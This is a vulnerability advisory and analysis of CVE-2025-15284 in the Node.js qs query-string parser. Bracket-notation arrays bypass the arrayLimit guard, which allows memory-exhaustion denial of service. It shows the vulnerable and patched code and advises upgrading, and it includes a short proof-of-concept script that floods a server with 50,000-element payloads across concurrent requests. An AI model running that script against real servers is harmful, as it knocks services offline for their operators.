The `qs` library, used by Express and others to parse query strings, has a setting called `arrayLimit` to prevent memory exhaustion. Versions < 6.14.1 fail to apply this limit to bracket notation (`key[]=value`). Attackers can send a single request with thousands of keys to crash the server. Patch immediately to 6.14.1.
A logic flaw in the ubiquitous `qs` library allows attackers to bypass the `arrayLimit` security control using bracket notation. This enables unauthenticated Denial of Service (DoS) attacks against Node.js applications by exhausting server memory with massive arrays.
If you are a Node.js developer, you almost certainly use qs. It is the heavy-lifting query string parser sitting underneath giants like Express, NestJS, and Koajs. It is responsible for turning ?user[name]=admin&user[role]=god into the nice JSON objects you use in your controllers.
Because parsing user input is inherently dangerous, qs comes with built-in guardrails. The most critical one is arrayLimit. By default, this is set to 20. The logic is sound: if a user tries to send a query string with 10,000 array items, qs should stop them, treat the extra items as object keys, or truncate the array to prevent memory exhaustion.
CVE-2025-15284 is the realization that this guardrail was essentially a cardboard cutout. It looked intimidating to explicit indices like a[100]=x, but if you simply used the polite bracket notation a[]=x, the parser held the door open and let you allocate as much memory as you wanted. It is a classic case of "security by checking the wrong variable."
To understand the bug, you have to understand how qs handles arrays. It supports two main styles:
arr[0]=a&arr[1]=barr[]=a&arr[]=bThe vulnerability lies in the inconsistency between these two handlers. When qs parsed an indexed value, it rigorously checked the index against the arrayLimit. If you tried arr[9999]=x, it would politely refuse to create a sparse array of that size (or convert it to an object depending on settings).
However, the handler for bracket notation was missing this check entirely. In lib/parse.js, when the parser encountered [], it simply pushed the value into the array accumulator without checking if the array's length had already exceeded the configured limit. This effectively allowed an attacker to bypass the default limit of 20 and create arrays with 100,000+ elements, consuming megabytes of RAM per request.
The fix, applied in commit 3086902, is a perfect illustration of the oversight. The developers had to pipe the arrayLimit option all the way down into the utils.combine function, which handles the merging of values.
Before the patch, the code essentially did this (simplified):
// Vulnerable Logic
if (isArray(target)) {
target.push(value);
return target;
}The patch introduces a check to see if the array has grown too large. If it hits the limit, it converts the array structure into an object structure, which prevents the V8 engine from trying to allocate massive contiguous blocks of memory for arrays and allows qs to stop treating it as a growable list.
// Patched Logic
if (Array.isArray(target) && target.length >= options.arrayLimit) {
// Convert to object to stop array growth
target = utils.toObject(target);
target[Object.keys(target).length] = value;
return target;
}This forces the data structure to degrade gracefully rather than exploding efficiently.
Exploiting this is trivially easy and requires no authentication. The goal is to construct a payload that maximizes memory allocation. Since qs recursively parses nested objects, we can either go deep or go wide. The "wide" attack using [] is the vector here.
Here is a conceptual Proof of Concept (PoC) script:
const axios = require('axios');
// Create a massive query string bypassing the default limit of 20
const payload = 'a[]=' + Array(50000).fill('junk').join('&a[]=');
console.log(`Payload size: ${(payload.length / 1024 / 1024).toFixed(2)} MB`);
// Fire off concurrent requests
for (let i = 0; i < 50; i++) {
axios.get(`http://target-server.com/api?${payload}`)
.catch(e => console.log('Request failed (server likely crashed)'));
}When the server receives this, it attempts to construct an array of 50,000 strings for each request. In Node.js, these objects live on the heap. If the Garbage Collector (GC) cannot keep up with the allocation rate of incoming requests, the process hits the V8 memory limit (usually ~1.5GB default) and terminates with FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed.
You might think, "So what? I have auto-scaling." But DoS vulnerabilities like this are asymmetric. It takes an attacker milliseconds and kilobytes of bandwidth to generate a request that consumes seconds of CPU time and hundreds of megabytes of RAM on your server.
This is particularly dangerous for:
console.log(req.query)), the serialization of a massive array can block the event loop even longer than the parsing itself.Because qs is a deep dependency, you might not even know you are using it. It is likely buried inside your framework's body parser.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
qs ljharb | < 6.14.1 | 6.14.1 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-20 |
| Attack Vector | Network |
| CVSS | 7.5 (High) |
| Impact | Denial of Service (DoS) |
| Exploit Status | PoC Available |
| Fixed Version | 6.14.1 |
Improper Input Validation
Get the latest CVE analysis reports delivered to your inbox.